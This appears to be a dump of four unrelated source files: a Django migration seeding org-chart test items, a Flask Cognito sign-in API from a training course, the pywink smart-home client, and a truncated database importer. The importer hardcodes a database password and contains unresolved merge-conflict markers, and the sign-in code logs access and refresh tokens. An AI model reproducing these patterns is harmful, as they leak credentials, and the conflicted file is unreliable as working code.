item_id=i_tree_view_of_org_structure_person_9,
text_detail="<NAME> (Gestionnaire, Assurance de la qualité - vous)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_org_structure_person_10,
text_detail="<NAME> (Services and Support Manager)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_org_structure_person_10,
text_detail="<NAME> (Gestionnaire, Service et soutien)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_org_structure_person_11,
text_detail="<NAME> (Audits Manager)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_org_structure_person_11,
text_detail="<NAME> (Gestionnaire, Vérifications)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_org_structure_person_12,
text_detail="<NAME> (E-Training Manager)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_org_structure_person_12,
text_detail="<NAME> (Gestionnaire, Formation en ligne)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_team_info_person_1,
text_detail="<NAME> (Quality Assurance Manager - You)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_team_info_person_1,
text_detail="<NAME> (Gestionnaire, Assurance de la qualité - vous)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_team_info_person_2,
text_detail="<NAME> (QA Analyst)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_team_info_person_2,
text_detail="<NAME> (Analyste de l’assurance de la qualité)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_team_info_person_3,
text_detail="<NAME> (QA Analyst)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_team_info_person_3,
text_detail="<NAME> (Analyste de l’assurance de la qualité)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_team_info_person_4,
text_detail="<NAME> (QA Analyst)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_team_info_person_4,
text_detail="<NAME> (Analyste de l’assurance de la qualité)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_team_info_person_5,
text_detail="<NAME> (QA Analyst)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_team_info_person_5,
text_detail="<NAME> (Analyste de l’assurance de la qualité)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_team_info_person_6,
text_detail="<NAME> (QA Analyst)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_team_info_person_6,
text_detail="<NAME> (Analyste de l’assurance de la qualité)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_team_info_person_7,
text_detail="<NAME> (QA Analyst)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_team_info_person_7,
text_detail="<NAME> (Analyste de l’assurance de la qualité)",
language=l_french,
),
]
)
def destroy_background_tree_view_info(apps, schema_editor):
# get models
language = apps.get_model("custom_models", "Language")
item_type = apps.get_model("custom_models", "ItemType")
item = apps.get_model("custom_models", "Item")
item_text = apps.get_model("custom_models", "ItemText")
test = apps.get_model("custom_models", "Test")
# get db alias
db_alias = schema_editor.connection.alias
# get language objects
l_english = (
language.objects.using(db_alias)
.filter(ISO_Code_1="en", ISO_Code_2="en-ca")
.last()
)
l_french = (
language.objects.using(db_alias)
.filter(ISO_Code_1="fr", ISO_Code_2="fr-ca")
.last()
)
# get item_type objects
it_tree_view = (
item_type.objects.using(db_alias).filter(type_desc="tree-view").last()
)
it_organizational_structure_tree_child = (
item_type.objects.using(db_alias).filter(type_desc="organizational-structure-tree-child").last()
)
it_team_information_tree_child = (
item_type.objects.using(db_alias).filter(type_desc="team-information-tree-child").last()
)
# get item objects
emib_sample_item_id = (
test.objects.using(db_alias).filter(test_name="emibSampleTest").last().item_id
)
it_background = (
item_type.objects.using(db_alias).filter(type_desc="background").last()
)
background_id = (
item.objects.using(db_alias)
.filter(parent_id=emib_sample_item_id, item_type_id=it_background, order=0)
.last()
)
i_tree_view_of_org_structure = (
item.objects.using(db_alias)
.filter(parent_id=background_id, item_type_id=it_tree_view, order=1)
.last()
)
i_tree_view_of_org_structure_person_1 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_org_structure, item_type_id=it_organizational_structure_tree_child, order=1)
.last()
)
i_tree_view_of_org_structure_person_2 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_org_structure_person_1, item_type_id=it_organizational_structure_tree_child, order=1)
.last()
)
i_tree_view_of_org_structure_person_3 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_org_structure_person_2, item_type_id=it_organizational_structure_tree_child, order=1)
.last()
)
i_tree_view_of_org_structure_person_4 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_org_structure_person_2, item_type_id=it_organizational_structure_tree_child, order=2)
.last()
)
i_tree_view_of_org_structure_person_5 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_org_structure_person_2, item_type_id=it_organizational_structure_tree_child, order=3)
.last()
)
i_tree_view_of_org_structure_person_6 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_org_structure_person_1, item_type_id=it_organizational_structure_tree_child, order=2)
.last()
)
i_tree_view_of_org_structure_person_7 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_org_structure_person_1, item_type_id=it_organizational_structure_tree_child, order=3)
.last()
)
i_tree_view_of_org_structure_person_8 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_org_structure_person_1, item_type_id=it_organizational_structure_tree_child, order=4)
.last()
)
i_tree_view_of_org_structure_person_9 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_org_structure_person_8, item_type_id=it_organizational_structure_tree_child, order=1)
.last()
)
i_tree_view_of_org_structure_person_10 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_org_structure_person_8, item_type_id=it_organizational_structure_tree_child, order=2)
.last()
)
i_tree_view_of_org_structure_person_11 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_org_structure_person_8, item_type_id=it_organizational_structure_tree_child, order=3)
.last()
)
i_tree_view_of_org_structure_person_12 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_org_structure_person_8, item_type_id=it_organizational_structure_tree_child, order=4)
.last()
)
i_tree_view_of_team_info = (
item.objects.using(db_alias)
.filter(parent_id=background_id, item_type_id=it_tree_view, order=2)
.last()
)
i_tree_view_of_team_info_person_1 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_team_info, item_type_id=it_team_information_tree_child, order=1)
.last()
)
i_tree_view_of_team_info_person_2 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_team_info_person_1, item_type_id=it_team_information_tree_child, order=1)
.last()
)
i_tree_view_of_team_info_person_3 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_team_info_person_1, item_type_id=it_team_information_tree_child, order=2)
.last()
)
i_tree_view_of_team_info_person_4 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_team_info_person_1, item_type_id=it_team_information_tree_child, order=3)
.last()
)
i_tree_view_of_team_info_person_5 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_team_info_person_1, item_type_id=it_team_information_tree_child, order=4)
.last()
)
i_tree_view_of_team_info_person_6 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_team_info_person_1, item_type_id=it_team_information_tree_child, order=5)
.last()
)
i_tree_view_of_team_info_person_7 = (
item.objects.using(db_alias)
.filter(parent_id=i_tree_view_of_team_info_person_1, item_type_id=it_team_information_tree_child, order=6)
.last()
)
# destroy item_text
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_1, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_1, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_2, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_2, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_3, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_3, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_4, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_4, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_5, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_5, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_6, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_6, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_7, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_7, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_8, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_8, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_9, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_9, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_10, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_10, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_11, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_11, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_12, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure_person_12, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_org_structure, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_1, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_1, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_2, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_2, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_3, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_3, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_4, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_4, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_5, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_5, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_6, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_6, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_7, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info_person_7, language=l_french
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info, language=l_english
).delete()
item_text.objects.using(db_alias).filter(
item_id=i_tree_view_of_team_info, language=l_french
).delete()
# destroy items; inverted order as children must be deleted first
i_tree_view_of_org_structure_person_1.delete()
i_tree_view_of_org_structure_person_2.delete()
i_tree_view_of_org_structure_person_3.delete()
i_tree_view_of_org_structure_person_4.delete()
i_tree_view_of_org_structure_person_5.delete()
i_tree_view_of_org_structure_person_6.delete()
i_tree_view_of_org_structure_person_7.delete()
i_tree_view_of_org_structure_person_8.delete()
i_tree_view_of_org_structure_person_9.delete()
i_tree_view_of_org_structure_person_10.delete()
i_tree_view_of_org_structure_person_11.delete()
i_tree_view_of_org_structure_person_12.delete()
i_tree_view_of_org_structure.delete()
i_tree_view_of_team_info_person_1.delete()
i_tree_view_of_team_info_person_2.delete()
i_tree_view_of_team_info_person_3.delete()
i_tree_view_of_team_info_person_4.delete()
i_tree_view_of_team_info_person_5.delete()
i_tree_view_of_team_info_person_6.delete()
i_tree_view_of_team_info_person_7.delete()
i_tree_view_of_team_info.delete()
it_team_information_tree_child.delete()
it_organizational_structure_tree_child.delete()
it_tree_view.delete()
class Migration(migrations.Migration):
dependencies = [("custom_models", "0012_update_emib_sample_fr")]
operations = [
migrations.RunPython(
upload_background_tree_view_info, destroy_background_tree_view_info
)
]
| 1.765625 | 2 |
LAB03/04-Xray/backend/cloudalbum/api/users.py | liks79/moving-to-serverless-renew | 6 | 12766385 | """
cloudalbum/api/users.py
~~~~~~~~~~~~~~~~~~~~~~~
REST API for users
:description: CloudAlbum is a fully featured sample application for 'Moving to AWS serverless' training course
:copyright: © 2019 written by <NAME>, <NAME>.
:license: MIT, see LICENSE for more details.
"""
import hashlib
import boto3, hmac, base64
from botocore.exceptions import ClientError
from flask import Blueprint, request
from flask import current_app as app
from flask import jsonify, make_response
from flask_restplus import Api, Resource, fields
from jsonschema import ValidationError
from werkzeug.exceptions import InternalServerError, BadRequest, Conflict
from cloudalbum.schemas import validate_user
from cloudalbum.solution import solution_signup_cognito
from cloudalbum.util.jwt_helper import get_token_from_header, cog_jwt_required
users_blueprint = Blueprint('users', __name__)
api = Api(users_blueprint, doc='/swagger/', title='Users',
description='CloudAlbum-users: \n prefix url "/users" is already exist.', version='0.1')
response = api.model('Response', {
'code': fields.Integer,
'message': fields.String,
'data': fields.String
})
signup_user = api.model('Signup_user', {
'email': fields.String,
'username': fields.String,
'password': fields.String
})
signin_user = api.model('Signin_user', {
'email': fields.String,
'password': fields.String
})
@api.route('/ping')
class Ping(Resource):
@api.doc(responses={200: 'pong!'})
def get(self):
"""Ping api"""
app.logger.debug('success:ping pong!')
return make_response({'ok': True, 'Message': 'pong'}, 200)
@api.route('/', strict_slashes=False)
class UsersList(Resource):
@api.doc(
responses=
{
200: 'Return the whole users list',
500: 'Internal server error'
}
)
def get(self):
"""Get all users as list"""
try:
client = boto3.client('cognito-idp')
response = client.list_users(
UserPoolId=app.config['COGNITO_POOL_ID'],
AttributesToGet=['sub', 'email', 'name']
)
data = []
for user in response['Users']:
one_user = {}
for attr in user['Attributes']:
key = attr['Name']
if key == 'sub':
key = 'user_id'
one_user[key] = attr['Value']
data.append(one_user)
app.logger.debug('success:users_list: {0}'.format(data))
return make_response({'ok': True, 'users': data}, 200)
except Exception as e:
app.logger.error('users list failed')
app.logger.error(e)
raise InternalServerError('Retrieve user list failed')
@api.route('/<user_id>')
class Users(Resource):
@api.doc(responses={
200: 'Return a user data',
500: 'Internal server error'
})
def get(self, user_id):
"""Get a single user details"""
client = boto3.client('cognito-idp')
try:
response = client.admin_get_user(
UserPoolId=app.config['COGNITO_POOL_ID'],
Username=user_id
)
user_data ={}
for attr in response['UserAttributes']:
key = attr['Name']
if key == 'sub':
key = 'user_id'
val = attr['Value']
user_data[key] = val
app.logger.debug('success: get Cognito user data: {}'.format(user_data))
return make_response({'ok': True, 'users': user_data}, 200)
except ValueError as e:
app.logger.error('ERROR:user_get_by_id:{}'.format(user_id))
app.logger.error(e)
raise BadRequest(e)
except Exception as e:
app.logger.error('ERROR:user_get_by_id:{}'.format(user_id))
app.logger.error(e)
raise InternalServerError('Unexpected Error:{0}'.format(e))
def cognito_signup(signup_user):
user = signup_user;
msg = '{0}{1}'.format(user['email'], app.config['COGNITO_CLIENT_ID'])
dig = hmac.new(app.config['COGNITO_CLIENT_SECRET'].encode('utf-8'),
msg=msg.encode('utf-8'),
digestmod=hashlib.sha256).digest()
# TODO 7: Implement following solution code to sign up user into cognito user pool
try:
return solution_signup_cognito(user, dig)
except ClientError as e:
if e.response['Error']['Code'] == 'UsernameExistsException':
raise Conflict('ERROR: Existed user!')
except Exception as e:
raise BadRequest(e.response['Error']['Message'])
@api.route('/signup')
class Signup(Resource):
@api.doc(responses={
201: 'Return a user data',
400: 'Invalidate email/password',
500: 'Internal server error'
})
@api.expect(signup_user)
def post(self):
"""Enroll a new user"""
req_data = request.get_json()
try:
validated = validate_user(req_data)
user_data = validated['data']
user = cognito_signup(user_data)
app.logger.debug('success: enroll user into Cognito user pool:{}'.format(user))
return make_response({'ok': True, 'users': user}, 201)
except ValidationError as e:
app.logger.error('ERROR:invalid signup data format:{0}'.format(req_data))
app.logger.error(e)
raise BadRequest(e.message)
def cognito_signin(cognito_client, user):
msg = '{0}{1}'.format(user['email'], app.config['COGNITO_CLIENT_ID'])
dig = hmac.new(app.config['COGNITO_CLIENT_SECRET'].encode('utf-8'),
msg=msg.encode('utf-8'),
digestmod=hashlib.sha256).digest()
auth= base64.b64encode(dig).decode()
resp = cognito_client.admin_initiate_auth(UserPoolId=app.config['COGNITO_POOL_ID'],
ClientId=app.config['COGNITO_CLIENT_ID'],
AuthFlow='ADMIN_NO_SRP_AUTH',
AuthParameters={'SECRET_HASH': auth,'USERNAME': user['email'], 'PASSWORD': user['password']})
access_token = resp['AuthenticationResult']['AccessToken']
refresh_token = resp['AuthenticationResult']['RefreshToken']
return access_token, refresh_token
@api.route('/signin')
class Signin(Resource):
@api.doc(responses={
200: 'login success',
400: 'Invalidate data',
500: 'Internal server error'
})
@api.expect(signin_user)
def post(self):
"""user signin"""
req_data = request.get_json()
client = boto3.client('cognito-idp')
try:
signin_data = validate_user(req_data)['data']
access_token, refresh_token = cognito_signin(client, signin_data)
res = jsonify({'accessToken': access_token, 'refreshToken': refresh_token})
app.logger.debug('success:user signin:access_token:{}, refresh_token:{}'.format(access_token, refresh_token))
return make_response(res, 200)
except client.exceptions.UserNotFoundException as e:
app.logger.error('User does not exist: {0}'.format(signin_data))
app.logger.error(e)
raise BadRequest('User does not exist')
except client.exceptions.NotAuthorizedException as e:
app.logger.error('Password is mismatched or invalid user: {0}'.format(signin_data))
app.logger.error(e)
raise BadRequest('Password is mismatched or invalid user')
except ValidationError as e:
app.logger.error('Invalid data format: {0}'.format(req_data))
app.logger.error(e)
raise BadRequest(e.message)
except Exception as e:
app.logger.error('Unexpected error: {0}'.format(req_data))
app.logger.error(e)
raise InternalServerError('Unexpected error: {0}'.format(req_data))
@api.route('/signout')
class Signout(Resource):
@cog_jwt_required
@api.doc(responses={
200: 'signout success',
500: 'login required'
})
def post(self):
"""user signout"""
token = get_token_from_header(request)
try:
client = boto3.client('cognito-idp')
response = client.global_sign_out(
AccessToken=token
)
app.logger.debug('Access token expired: {}'.format(token))
return make_response({'ok': True}, 200)
except Exception as e:
app.logger.error('Sign-out:unknown issue:token:{}'.format(token))
app.logger.error(e)
raise InternalServerError(e)
| 2.4375 | 2 |
homeassistant/external/wink/pywink.py | hemantsangwan/home-assistant | 2 | 12766386 | __author__ = 'JOHNMCL'
import json
import time
import requests
baseUrl = "https://winkapi.quirky.com"
headers = {}
class wink_sensor_pod(object):
""" represents a wink.py sensor
json_obj holds the json stat at init (and if there is a refresh it's updated
it's the native format for this objects methods
and looks like so:
{
"data": {
"last_event": {
"brightness_occurred_at": None,
"loudness_occurred_at": None,
"vibration_occurred_at": None
},
"model_name": "Tripper",
"capabilities": {
"sensor_types": [
{
"field": "opened",
"type": "boolean"
},
{
"field": "battery",
"type": "percentage"
}
]
},
"manufacturer_device_model": "quirky_ge_tripper",
"location": "",
"radio_type": "zigbee",
"manufacturer_device_id": None,
"gang_id": None,
"sensor_pod_id": "37614",
"subscription": {
},
"units": {
},
"upc_id": "184",
"hidden_at": None,
"last_reading": {
"battery_voltage_threshold_2": 0,
"opened": False,
"battery_alarm_mask": 0,
"opened_updated_at": 1421697092.7347496,
"battery_voltage_min_threshold_updated_at": 1421697092.7347229,
"battery_voltage_min_threshold": 0,
"connection": None,
"battery_voltage": 25,
"battery_voltage_threshold_1": 25,
"connection_updated_at": None,
"battery_voltage_threshold_3": 0,
"battery_voltage_updated_at": 1421697092.7347066,
"battery_voltage_threshold_1_updated_at": 1421697092.7347302,
"battery_voltage_threshold_3_updated_at": 1421697092.7347434,
"battery_voltage_threshold_2_updated_at": 1421697092.7347374,
"battery": 1.0,
"battery_updated_at": 1421697092.7347553,
"battery_alarm_mask_updated_at": 1421697092.734716
},
"triggers": [
],
"name": "MasterBathroom",
"lat_lng": [
37.550773,
-122.279182
],
"uuid": "a2cb868a-dda3-4211-ab73-fc08087aeed7",
"locale": "en_us",
"device_manufacturer": "quirky_ge",
"created_at": 1421523277,
"local_id": "2",
"hub_id": "88264"
},
}
"""
def __init__(self, aJSonObj, objectprefix="sensor_pods"):
self.jsonState = aJSonObj
self.objectprefix = objectprefix
def __str__(self):
return "%s %s %s" % (self.name(), self.deviceId(), self.state())
def __repr__(self):
return "<Wink sensor %s %s %s>" % (self.name(), self.deviceId(), self.state())
@property
def _last_reading(self):
return self.jsonState.get('last_reading') or {}
def name(self):
return self.jsonState.get('name', "Unknown Name")
def state(self):
return self._last_reading.get('opened', False)
def deviceId(self):
return self.jsonState.get('sensor_pod_id', self.name())
def refresh_state_at_hub(self):
"""
Tell hub to query latest status from device and upload to Wink.
PS: Not sure if this even works..
"""
urlString = baseUrl + "/%s/%s/refresh" % (self.objectprefix, self.deviceId())
requests.get(urlString, headers=headers)
def updateState(self):
""" Update state with latest info from Wink API. """
urlString = baseUrl + "/%s/%s" % (self.objectprefix, self.deviceId())
arequest = requests.get(urlString, headers=headers)
self._updateStateFromResponse(arequest.json())
def _updateStateFromResponse(self, response_json):
"""
:param response_json: the json obj returned from query
:return:
"""
self.jsonState = response_json.get('data')
class wink_binary_switch(object):
""" represents a wink.py switch
json_obj holds the json stat at init (and if there is a refresh it's updated
it's the native format for this objects methods
and looks like so:
{
"data": {
"binary_switch_id": "4153",
"name": "Garage door indicator",
"locale": "en_us",
"units": {},
"created_at": 1411614982,
"hidden_at": null,
"capabilities": {},
"subscription": {},
"triggers": [],
"desired_state": {
"powered": false
},
"manufacturer_device_model": "leviton_dzs15",
"manufacturer_device_id": null,
"device_manufacturer": "leviton",
"model_name": "Switch",
"upc_id": "94",
"gang_id": null,
"hub_id": "11780",
"local_id": "9",
"radio_type": "zwave",
"last_reading": {
"powered": false,
"powered_updated_at": 1411614983.6153464,
"powering_mode": null,
"powering_mode_updated_at": null,
"consumption": null,
"consumption_updated_at": null,
"cost": null,
"cost_updated_at": null,
"budget_percentage": null,
"budget_percentage_updated_at": null,
"budget_velocity": null,
"budget_velocity_updated_at": null,
"summation_delivered": null,
"summation_delivered_updated_at": null,
"sum_delivered_multiplier": null,
"sum_delivered_multiplier_updated_at": null,
"sum_delivered_divisor": null,
"sum_delivered_divisor_updated_at": null,
"sum_delivered_formatting": null,
"sum_delivered_formatting_updated_at": null,
"sum_unit_of_measure": null,
"sum_unit_of_measure_updated_at": null,
"desired_powered": false,
"desired_powered_updated_at": 1417893563.7567682,
"desired_powering_mode": null,
"desired_powering_mode_updated_at": null
},
"current_budget": null,
"lat_lng": [
38.429996,
-122.653721
],
"location": "",
"order": 0
},
"errors": [],
"pagination": {}
}
"""
def __init__(self, aJSonObj, objectprefix="binary_switches"):
self.jsonState = aJSonObj
self.objectprefix = objectprefix
# Tuple (desired state, time)
self._last_call = (0, None)
def __str__(self):
return "%s %s %s" % (self.name(), self.deviceId(), self.state())
def __repr__(self):
return "<Wink switch %s %s %s>" % (self.name(), self.deviceId(), self.state())
@property
def _last_reading(self):
return self.jsonState.get('last_reading') or {}
def name(self):
return self.jsonState.get('name', "Unknown Name")
def state(self):
# Optimistic approach to setState:
# Within 15 seconds of a call to setState we assume it worked.
if self._recent_state_set():
return self._last_call[1]
return self._last_reading.get('powered', False)
def deviceId(self):
return self.jsonState.get('binary_switch_id', self.name())
def setState(self, state):
"""
:param state: a boolean of true (on) or false ('off')
:return: nothing
"""
urlString = baseUrl + "/%s/%s" % (self.objectprefix, self.deviceId())
values = {"desired_state": {"powered": state}}
arequest = requests.put(urlString, data=json.dumps(values), headers=headers)
self._updateStateFromResponse(arequest.json())
self._last_call = (time.time(), state)
def refresh_state_at_hub(self):
"""
Tell hub to query latest status from device and upload to Wink.
PS: Not sure if this even works..
"""
urlString = baseUrl + "/%s/%s/refresh" % (self.objectprefix, self.deviceId())
requests.get(urlString, headers=headers)
def updateState(self):
""" Update state with latest info from Wink API. """
urlString = baseUrl + "/%s/%s" % (self.objectprefix, self.deviceId())
arequest = requests.get(urlString, headers=headers)
self._updateStateFromResponse(arequest.json())
def wait_till_desired_reached(self):
""" Wait till desired state reached. Max 10s. """
if self._recent_state_set():
return
# self.refresh_state_at_hub()
tries = 1
while True:
self.updateState()
last_read = self._last_reading
if last_read.get('desired_powered') == last_read.get('powered') \
or tries == 5:
break
time.sleep(2)
tries += 1
self.updateState()
last_read = self._last_reading
def _updateStateFromResponse(self, response_json):
"""
:param response_json: the json obj returned from query
:return:
"""
self.jsonState = response_json.get('data')
def _recent_state_set(self):
return time.time() - self._last_call[0] < 15
class wink_bulb(wink_binary_switch):
""" represents a wink.py bulb
json_obj holds the json stat at init (and if there is a refresh it's updated
it's the native format for this objects methods
and looks like so:
"light_bulb_id": "33990",
"name": "downstaurs lamp",
"locale": "en_us",
"units":{},
"created_at": 1410925804,
"hidden_at": null,
"capabilities":{},
"subscription":{},
"triggers":[],
"desired_state":{"powered": true, "brightness": 1},
"manufacturer_device_model": "lutron_p_pkg1_w_wh_d",
"manufacturer_device_id": null,
"device_manufacturer": "lutron",
"model_name": "Caseta Wireless Dimmer & Pico",
"upc_id": "3",
"hub_id": "11780",
"local_id": "8",
"radio_type": "lutron",
"linked_service_id": null,
"last_reading":{
"brightness": 1,
"brightness_updated_at": 1417823487.490747,
"connection": true,
"connection_updated_at": 1417823487.4907365,
"powered": true,
"powered_updated_at": 1417823487.4907532,
"desired_powered": true,
"desired_powered_updated_at": 1417823485.054675,
"desired_brightness": 1,
"desired_brightness_updated_at": 1417409293.2591703
},
"lat_lng":[38.429962, -122.653715],
"location": "",
"order": 0
"""
jsonState = {}
def __init__(self, ajsonobj):
super().__init__(ajsonobj, "light_bulbs")
def deviceId(self):
return self.jsonState.get('light_bulb_id', self.name())
def brightness(self):
return self._last_reading.get('brightness')
def setState(self, state, brightness=None):
"""
:param state: a boolean of true (on) or false ('off')
:return: nothing
"""
urlString = baseUrl + "/light_bulbs/%s" % self.deviceId()
values = {
"desired_state": {
"powered": state
}
}
if brightness is not None:
values["desired_state"]["brightness"] = brightness
urlString = baseUrl + "/light_bulbs/%s" % self.deviceId()
arequest = requests.put(urlString, data=json.dumps(values), headers=headers)
self._updateStateFromResponse(arequest.json())
self._last_call = (time.time(), state)
def __repr__(self):
return "<Wink Bulb %s %s %s>" % (
self.name(), self.deviceId(), self.state())
def get_devices(filter, constructor):
arequestUrl = baseUrl + "/users/me/wink_devices"
j = requests.get(arequestUrl, headers=headers).json()
items = j.get('data')
devices = []
for item in items:
id = item.get(filter)
if (id is not None and item.get("hidden_at") is None):
devices.append(constructor(item))
return devices
def get_bulbs():
return get_devices('light_bulb_id', wink_bulb)
def get_switches():
return get_devices('binary_switch_id', wink_binary_switch)
def get_sensors():
return get_devices('sensor_pod_id', wink_sensor_pod)
def is_token_set():
""" Returns if an auth token has been set. """
return bool(headers)
def set_bearer_token(token):
global headers
headers = {
"Content-Type": "application/json",
"Authorization": "Bearer {}".format(token)
}
if __name__ == "__main__":
sw = get_bulbs()
lamp = sw[3]
lamp.setState(False)
| 2.84375 | 3 |
dataParsers/dbImporter/DBImporter.py | JohnsonLu3/Gerrymandering-Analysis | 0 | 12766387 | <gh_stars>0
from sqlalchemy import create_engine
from sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey
from sqlalchemy.sql import select
from sqlalchemy import text
from sqlalchemy.ext.automap import automap_base
<<<<<<< HEAD
# To test in memory no DB conn required right now
connection_string = "mysql+pymysql://johnsonlu:abc123@cse308.ch4xgfzmcq2l.us-east-1.rds.amazonaws.com:3306/gerrymandering"
engine = create_engine(connection_string, echo=True)
conn = engine.connect()
metadata = MetaData()
metadata.reflect(bind=engine)
Base = automap_base()
Base.prepare(engine, reflect=True)
Boundaries = Base.classes.Boundaries
States = Base.classes.States
Districts = Base.classes.Districts
Population = Base.classes.Population
=======
connection_string = ''
engine = None
conn = None
metadata = None
Base = None
Boundaries = None
States = None
Districts = None
Population = None
>>>>>>> build-2
stateFPs = {}
def main():
<<<<<<< HEAD
# printTables()
buildStateFPMap()
#importStateData()
#importStateBoundaryData()
importDistrictsAndVote('../parsedFiles/votingData.csv')
=======
connectToDB()
# printTables()
#buildStateFPMap()
#importStateData()
importStateBoundaryData()
#importDistrictsAndVote('../parsedFiles/votingData.csv')
#importPopulationData('../parsedFiles/VirginiaCensus.csv', "Virginia")
#importPopulationData('../parsedFiles/NorthCarolinaCensus.csv', "North Carolina")
#importPopulationData('../parsedFiles/nyCensus.csv', "New York")
importDistrictBoundary("../parsedFiles/DistrictGeo_2016.csv", 2012)
importDistrictBoundary("../parsedFiles/New_York_108_to_112.csv", 2001) # Redistricting follows census so this file
importDistrictBoundary("../parsedFiles/North_Carolina_108_to_112.csv", 2001)
importDistrictBoundary("../parsedFiles/Virginia_108_to_112.csv", 2001)
def connectToDB():
global conn
global engine
global Boundaries
global metadata
global Base
global States
global Districts
global Population
conURL = open('../Connection', 'r')
connection_string = conURL.readline()
engine = create_engine(connection_string, echo=True)
conn = engine.connect()
metadata = MetaData()
metadata.reflect(bind=engine)
Base = automap_base()
Base.prepare(engine, reflect=True)
Boundaries = Base.classes.Boundaries
States = Base.classes.States
